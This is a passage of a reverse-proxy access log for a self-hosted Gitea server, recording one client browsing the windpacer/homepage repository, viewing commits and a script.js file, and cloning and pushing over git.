192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11653] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:21:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 222.117.41.51] [Length 405177] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:31:42 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:21:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:21:31:42 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:21:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 222] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:21:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 222.117.41.51] [Length 17629] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/?sub_path=html%2Fassets%2Fjs%2Fscript.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 391] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:25:50 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:22:25:50 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:22:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:22:25:59 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:22:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11575] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 23697] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 40] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20348] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17480] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets?sub_path=" [Client 222.117.41.51] [Length 4334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets/js?sub_path=" [Client 222.117.41.51] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?only_content=true" [Client 222.117.41.51] [Length 9372] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:28:32 +0000] - 301 301 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 58] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/assets/js/script.js" +[17/Feb/2026:22:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js" [Client 222.117.41.51] [Length 19184] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs%2Fscript.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/assets/js/script.js" [Client 222.117.41.51] [Length 22298] [Gzip 8.82] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs%2Fscript.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js" [Client 222.117.41.51] [Length 19183] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs%2Fscript.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js/script.js" [Client 222.117.41.51] [Length 13746] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 23697] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 23697] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 20154] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 23697] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20333] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17466] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets?sub_path=" [Client 222.117.41.51] [Length 4334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets?only_content=true" [Client 222.117.41.51] [Length 4034] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets/js?sub_path=" [Client 222.117.41.51] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js?only_content=true" [Client 222.117.41.51] [Length 3266] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js?only_content=true" [Client 222.117.41.51] [Length 19461] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?only_content=true" [Client 222.117.41.51] [Length 9372] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 23697] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1?style=split&whitespace=show-all&show-outdated=" [Client 222.117.41.51] [Length 24059] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 